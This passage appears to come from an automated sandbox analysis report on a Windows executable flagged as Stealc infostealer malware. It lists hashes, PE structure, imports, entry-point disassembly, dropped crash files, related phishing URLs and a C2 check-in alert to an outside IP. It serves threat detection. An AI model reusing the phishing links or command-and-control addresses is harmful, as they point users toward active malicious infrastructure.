                      https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousPhisherBrowse
                      • 193.233.84.115
                      https://vpnassdsd1.blob.core.windows.net/vpnassdsd1/unsD.html#9-FFJWW/11-9623-VPOIK/746-001437-16337Get hashmaliciousUnknownBrowse
                      • 193.233.84.175
                      https://ramandan.blob.core.windows.net/ramandan/1.html#15/117-4966/926-74892-11463-Get hashmaliciousPhisherBrowse
                      • 193.233.84.175
                      http://z69p5gc0nk570ejit1fq6apix.ndsgfsjgffsnj.homes/4fdVxq8477PoaJ379hnzhvayyao8624EOSKQEYSWPRERBU64SNSB1959860q24Get hashmaliciousPhisherBrowse
                      • 193.233.84.88
                      No context
                      No context
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):65536
                      Entropy (8bit):0.95352202876216
                      Encrypted:false
                      SSDEEP:192:D9RLW5EvjPlotJ0+ihSfE3jpCZrMZtzuiFSZ24IO8ThB:7jN+q+ihS0jrTzuiFSY4IO8r
                      MD5:2A6AC0806EFEBE102663A5F84052B7BE
                      SHA1:4DD9EB1A61A74F40582C6537575EC2AE72439EC5
                      SHA-256:25BC9E55BFE4678603D7FBBF46F80378B3386D97FDC188286F45AB4FDE89E679
                      SHA-512:AFC8A0031EB0FCA3E59C0CB2B70F211E96C6F44EF7B6B2BD3D38E37EE9C54871F5B153DF03236BBF93E3838E04E0C91752727B9DA7476FDBF80D9B664BB4D2BF
                      Malicious:true
                      Reputation:low
                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.4.6.8.2.7.3.3.6.9.2.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.4.6.8.2.7.7.7.4.4.2.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.1.0.2.d.5.a.-.5.9.5.1.-.4.e.0.b.-.8.d.d.0.-.4.4.6.f.e.e.1.f.f.b.4.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.a.c.6.6.d.f.-.9.e.8.c.-.4.c.8.d.-.a.6.b.e.-.b.3.7.9.f.3.9.7.3.5.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.b.8.-.0.0.0.1.-.0.0.1.4.-.7.5.7.2.-.d.d.3.2.5.4.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.a.4.f.1.d.c.f.5.c.6.4.c.4.c.e.b.6.9.3.8.3.6.2.9.f.f.f.1.e.f.3.0.7.b.6.5.0.d.2.5.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9.
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 14 streams, Wed Sep 25 14:07:07 2024, 0x1205a4 type
                      Category:dropped
                      Size (bytes):67306
                      Entropy (8bit):2.0996832226563753
                      Encrypted:false
                      SSDEEP:384:kwhsXTMMWEERBc2Fbdjxmt3t9nSwm5qJmPtJJVplMVTR:xhsXTMNEE42Fbdlmt3/SwG49R
                      MD5:F8490D00AFEC0FF302CE158B7E743F7E
                      SHA1:016F4AF904A2DF0A27D1954BF22EB951CE53D97D
                      SHA-256:3766D414D1D6CCFC79E95B501991A756233CA424A66A722B6E95AAC09FEBC658
                      SHA-512:E59F1950356E91A50B6FDF837C16AE1527E787D0B489046441EA5D6F625D72B4FA76627F75E24DB2C0CFD96E4B43317ADE7D3DBA22213EAE1006412B4E7E9D45
                      Malicious:false
                      Reputation:low
                      Preview:MDMP..a..... ..........f............4...............<............*..........T.......8...........T...........P3..........................................................................................................eJ......H.......GenuineIntel............T..............f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8304
                      Entropy (8bit):3.6915971261409113
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJFCo6Aya0e6YEIJSU9+WogmfBizNYpDO89bC4bIsfRQs4jm:R6lXJX6AyY6YEWSU9xogmfUNSC4b7fdJ
                      MD5:58A8AFE69FCE3586FFE19912A0CAC7FA
                      SHA1:59D7F138706ACAD5950D7A6FDECCD52949B582E4
                      SHA-256:3BFDB8A6644E53CDD9951F7C78F2CAAF96A13AB487BCC3F7A46F97E4F7AF50A8
                      SHA-512:7340EA0C173EEBB84BB2F7C2E17DF11A81F50FB448FA02100E57674E92FBFF62BECCCDDB64599A2B10AD2C8445473A161B88CF20DB10492C1467B18213D67258
                      Malicious:false
                      Reputation:low
                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.8.4.<./.P.i.
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):4537
                      Entropy (8bit):4.4284488886592195
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zsSrJg77aI9GZWpW8VYjK3Ym8M4JXyFvi+q8e8WDi3d:uIjfSFI7Mo7VwJ+iQWDi3d
                      MD5:D4DB1E747567F8E3A5F2F9260BAC6000
                      SHA1:3CB0BB1CE21172130D1522A833A6B290E3D13AE0
                      SHA-256:C6DC7E1D516871116E571F89D458C3BF6794419FC350546D0159E6171F97ED77
                      SHA-512:18A87C753380FEB81E43850867D437BC7D3BD4BF0A113B4DA86B2ABB77B8720E476DAECC70D75EBF03C93E3FD93D7C3B21C71AD90B893B4D1DB999FD3D46DCEE
                      Malicious:false
                      Reputation:low
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515829" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:MS Windows registry file, NT/2000 or above
                      Category:dropped
                      Size (bytes):1835008
                      Entropy (8bit):4.421299279764158
                      Encrypted:false
                      SSDEEP:6144:D28Svfpi6ceLP/9skLmb0OTNWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:D2nvloTNW+EZMM6DFy403w
                      MD5:C96A5D4CC658CFD5768E3C73A1A8272B
                      SHA1:D9CEB8C87A812DCA9342856196581488AA100E61
                      SHA-256:5AEB30BC6023956AF9C83193B0C88AAFFF251A5BBF34AD057B4C0DC1A5D9526A
                      SHA-512:FA6F60C8130E36C6175C906B7D1FD775F532D702AE44D95F8A59EF089AA7881679C346BB609D23231A5CA3B147DEF9FBF8A69EEE7B737505DF44AE25BF49DC8E
                      Malicious:false
                      Reputation:low
                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...4T..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.848698322255329
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:418'304 bytes
                      MD5:b9685047e27fbb94ab3bd20943b85349
                      SHA1:a4f1dcf5c64c4ceb69383629fff1ef307b650d25
                      SHA256:26e70ce5246844690acc15b42d890012bf2d0df4fcdda2e3b5982d65b1731e65
                      SHA512:04faa79dd3b4dc3f86e48ca75edc0a8ea26286ee49cb05b6fe0e710427d0ea8ef29964e81564b14ce7deac1b5c65f0c66f4faaaa79177705a241de07d36d2bfd
                      SSDEEP:6144:gopeyI4EPijDnnCDxITWEu2WLCLUd6zFTqFrz3zxkixmSyO:9peX4EPcGDxIiHNCYAFCHjISyO
                      TLSH:C4948E83A2D1BC98F9114E32CD1EF6E4B7EEB5518E19676A23186F1F14722B1C1BB710
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M..A............f.......f.).)...f...u.....$.............f.......f.-.....f.*.....Rich............................PE..L....c.d...
                      Icon Hash:412945454d55710d
                      Entrypoint:0x4037e3
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x64A2631C [Mon Jul 3 05:56:44 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:a11cbe8ba3528a436618e8dc32e663a6
                      Instruction
                      call 00007F633D1A0D81h
                      jmp 00007F633D19D22Eh
                      int3
                      int3
                      int3
                      call 00007F633D19D3DCh
                      xchg cl, ch
                      jmp 00007F633D19D3C4h
                      call 00007F633D19D3D3h
                      fxch st(0), st(1)
                      jmp 00007F633D19D3BBh
                      fabs
                      fld1
                      mov ch, cl
                      xor cl, cl
                      jmp 00007F633D19D3B1h
                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                      fabs
                      fxch st(0), st(1)
                      fabs
                      fxch st(0), st(1)
                      fpatan
                      or cl, cl
                      je 00007F633D19D3A6h
                      fldpi
                      fsubrp st(1), st(0)
                      or ch, ch
                      je 00007F633D19D3A4h
                      fchs
                      ret
                      fabs
                      fld st(0), st(0)
                      fld st(0), st(0)
                      fld1
                      fsubrp st(1), st(0)
                      fxch st(0), st(1)
                      fld1
                      faddp st(1), st(0)
                      fmulp st(1), st(0)
                      ftst
                      wait
                      fstsw word ptr [ebp-000000A0h]
                      wait
                      test byte ptr [ebp-0000009Fh], 00000001h
                      jne 00007F633D19D3A7h
                      xor ch, ch
                      fsqrt
                      ret
                      pop eax
                      jmp 00007F633D19F95Fh
                      fstp st(0)
                      fld tbyte ptr [0041169Ah]
                      ret
                      fstp st(0)
                      or cl, cl
                      je 00007F633D19D3ADh
                      fstp st(0)
                      fldpi
                      or ch, ch
                      je 00007F633D19D3A4h
                      fchs
                      ret
                      fstp st(0)
                      fldz
                      or ch, ch
                      je 00007F633D19D399h
                      fchs
                      ret
                      fstp st(0)
                      jmp 00007F633D19F935h
                      fstp st(0)
                      mov cl, ch
                      jmp 00007F633D19D3A2h
                      call 00007F633D19D36Eh
                      jmp 00007F633D19F940h
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push ebp
                      mov ebp, esp
                      add esp, FFFFFD30h
                      push ebx
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [IMP] VS2008 SP1 build 30729
                      • [RES] VS2010 build 30319
                      • [LNK] VS2010 build 30319
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3fe2c0x64.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x205d0000x208d8.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3fe900x1c.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3f9880x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x110000x228.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xf9020xfa00ba98eff45809b4c2c6a2f99d24e3e9e9False0.607609375data6.755019654232395IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x110000x2fa9e0x2fc003e8ccd009e2bc70817d1198a642f22faFalse0.9431037303664922data7.882903084417779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x410000x201b2100x5e007c2973022e898393c19c016c687fb8d2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x205d0000x208d80x20a00faa4cbcbb6eaedc034653eb00768956fFalse0.4001960608237548data4.7569546140098256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      CERECUVIB0x20764880x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilIndia0.5897270021995084
                      CERECUVIB0x20764880x1e31ASCII text, with very long lines (7729), with no line terminatorsTamilSri Lanka0.5897270021995084
                      RT_CURSOR0x20782f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
                      RT_CURSOR0x20791a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
                      RT_CURSOR0x2079a480x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
                      RT_CURSOR0x2079fe00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                      RT_CURSOR0x207a1100xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                      RT_CURSOR0x207a1e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                      RT_CURSOR0x207b0900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                      RT_CURSOR0x207b9380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                      RT_ICON0x205daf00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.43176972281449894
                      RT_ICON0x205daf00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.43176972281449894
                      RT_ICON0x205e9980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5351985559566786
                      RT_ICON0x205e9980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5351985559566786
                      RT_ICON0x205f2400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.5973502304147466
                      RT_ICON0x205f2400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.5973502304147466
                      RT_ICON0x205f9080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6741329479768786
                      RT_ICON0x205f9080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6741329479768786
                      RT_ICON0x205fe700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.3261410788381743
                      RT_ICON0x205fe700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.3261410788381743
                      RT_ICON0x20624180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.4022045028142589
                      RT_ICON0x20624180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.4022045028142589
                      RT_ICON0x20634c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.46475409836065573
                      RT_ICON0x20634c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.46475409836065573
                      RT_ICON0x2063e480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.5460992907801419
                      RT_ICON0x2063e480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.5460992907801419
                      RT_ICON0x20643280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.36727078891257997
                      RT_ICON0x20643280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.36727078891257997
                      RT_ICON0x20651d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4503610108303249
                      RT_ICON0x20651d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4503610108303249
                      RT_ICON0x2065a780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4602534562211982
                      RT_ICON0x2065a780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4602534562211982
                      RT_ICON0x20661400x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.46170520231213874
                      RT_ICON0x20661400x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.46170520231213874
                      RT_ICON0x20666a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2662863070539419
                      RT_ICON0x20666a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2662863070539419
                      RT_ICON0x2068c500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30863039399624764
                      RT_ICON0x2068c500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30863039399624764
                      RT_ICON0x2069cf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.35904255319148937
                      RT_ICON0x2069cf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.35904255319148937
                      RT_ICON0x206a1c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.56636460554371
                      RT_ICON0x206a1c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.56636460554371
                      RT_ICON0x206b0700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.546028880866426
                      RT_ICON0x206b0700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.546028880866426
                      RT_ICON0x206b9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6170520231213873
                      RT_ICON0x206b9180x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6170520231213873
                      RT_ICON0x206be800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46431535269709545
                      RT_ICON0x206be800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46431535269709545
                      RT_ICON0x206e4280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4899155722326454
                      RT_ICON0x206e4280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4899155722326454
                      RT_ICON0x206f4d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.49631147540983606
                      RT_ICON0x206f4d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.49631147540983606
                      RT_ICON0x206fe580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.4530141843971631
                      RT_ICON0x206fe580x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.4530141843971631
                      RT_ICON0x20703280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.4904051172707889
                      RT_ICON0x20703280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.4904051172707889
                      RT_ICON0x20711d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.47021660649819497
                      RT_ICON0x20711d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.47021660649819497
                      RT_ICON0x2071a780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4356936416184971
                      RT_ICON0x2071a780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4356936416184971
                      RT_ICON0x2071fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27728215767634856
                      RT_ICON0x2071fe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27728215767634856
                      RT_ICON0x20745880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2893996247654784
                      RT_ICON0x20745880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2893996247654784
                      RT_ICON0x20756300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.30901639344262294
                      RT_ICON0x20756300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.30901639344262294
                      RT_ICON0x2075fb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.33687943262411346
                      RT_ICON0x2075fb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.33687943262411346
                      RT_DIALOG0x207c1280x58data0.8977272727272727
                      RT_STRING0x207c1800x560dataTamilIndia0.436046511627907
                      RT_STRING0x207c1800x560dataTamilSri Lanka0.436046511627907
                      RT_STRING0x207c6e00x616dataTamilIndia0.43838254172015406
                      RT_STRING0x207c6e00x616dataTamilSri Lanka0.43838254172015406
                      RT_STRING0x207ccf80x352dataTamilIndia0.45529411764705885
                      RT_STRING0x207ccf80x352dataTamilSri Lanka0.45529411764705885
                      RT_STRING0x207d0500x4fcdataTamilIndia0.44905956112852663
                      RT_STRING0x207d0500x4fcdataTamilSri Lanka0.44905956112852663
                      RT_STRING0x207d5500x382dataTamilIndia0.4621380846325167
                      RT_STRING0x207d5500x382dataTamilSri Lanka0.4621380846325167
                      RT_ACCELERATOR0x20782c00x38dataTamilIndia0.9107142857142857
                      RT_ACCELERATOR0x20782c00x38dataTamilSri Lanka0.9107142857142857
                      RT_GROUP_CURSOR0x2079fb00x30data0.9375
                      RT_GROUP_CURSOR0x207a1c00x22data1.0588235294117647
                      RT_GROUP_CURSOR0x207bea00x30data0.9375
                      RT_GROUP_ICON0x20702c00x68dataTamilIndia0.7115384615384616
                      RT_GROUP_ICON0x20702c00x68dataTamilSri Lanka0.7115384615384616
                      RT_GROUP_ICON0x20642b00x76dataTamilIndia0.6610169491525424
                      RT_GROUP_ICON0x20642b00x76dataTamilSri Lanka0.6610169491525424
                      RT_GROUP_ICON0x206a1600x68dataTamilIndia0.7115384615384616
                      RT_GROUP_ICON0x206a1600x68dataTamilSri Lanka0.7115384615384616
                      RT_GROUP_ICON0x20764200x68dataTamilIndia0.7211538461538461
                      RT_GROUP_ICON0x20764200x68dataTamilSri Lanka0.7211538461538461
                      RT_VERSION0x207bed00x258data0.5466666666666666
                      DLLImport
                      KERNEL32.dllInterlockedDecrement, GetCurrentProcess, SetEnvironmentVariableW, CreateJobObjectW, SetComputerNameW, CreateHardLinkA, GetModuleHandleW, EnumCalendarInfoExW, GetNumberFormatA, GetWindowsDirectoryA, SetCommState, LoadLibraryW, GetLocaleInfoW, ReadConsoleInputA, GetCalendarInfoW, CreateEventA, SetVolumeMountPointA, GetConsoleAliasExesLengthW, GetVersionExW, GetFileAttributesA, EnumSystemCodePagesA, GetTimeFormatW, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, SetThreadPriority, GetTempPathW, VerifyVersionInfoW, GlobalUnfix, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, EnumCalendarInfoW, CreateNamedPipeA, LoadModule, GlobalFree, GetProcessVersion, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingA, LocalAlloc, SetCalendarInfoW, FoldStringA, EnumDateFormatsA, GlobalUnWire, GetProcessShutdownParameters, LoadLibraryExA, GetFileTime, WaitForDebugEvent, OpenEventW, GetShortPathNameW, SetFileShortNameA, GetDiskFreeSpaceExW, LCMapStringW, CommConfigDialogW, ReadFile, GetProcessHeap, SetEndOfFile, GetStringTypeW, MultiByteToWideChar, CreateFileW, WriteConsoleW, InterlockedIncrement, GetConsoleAliasExesA, TlsGetValue, SetFilePointer, GetProcAddress, SetDefaultCommConfigA, FlushFileBuffers, SetStdHandle, HeapFree, EncodePointer, DecodePointer, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, IsProcessorFeaturePresent, WideCharToMultiByte, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapCreate, Sleep, HeapSize, ExitProcess, RtlUnwind, HeapAlloc, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA
                      USER32.dllGetWindowLongW, SetCaretPos, CharUpperA, InsertMenuItemW, DrawStateA, LoadMenuA, CharLowerBuffA, GetSysColor, GetMenuStringA, SetMenu
                      GDI32.dllGetBkMode, CreateDCW, GetCharWidth32W, GetTextCharset, GetCharWidthI
                      WINHTTP.dllWinHttpCloseHandle
                      Language of compilation systemCountry where language is spokenMap
                      TamilIndia
                      TamilSri Lanka
                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-25T16:07:07.928509+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704193.233.113.18480TCP
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 25, 2024 16:07:06.579904079 CEST4970480192.168.2.5193.233.113.184
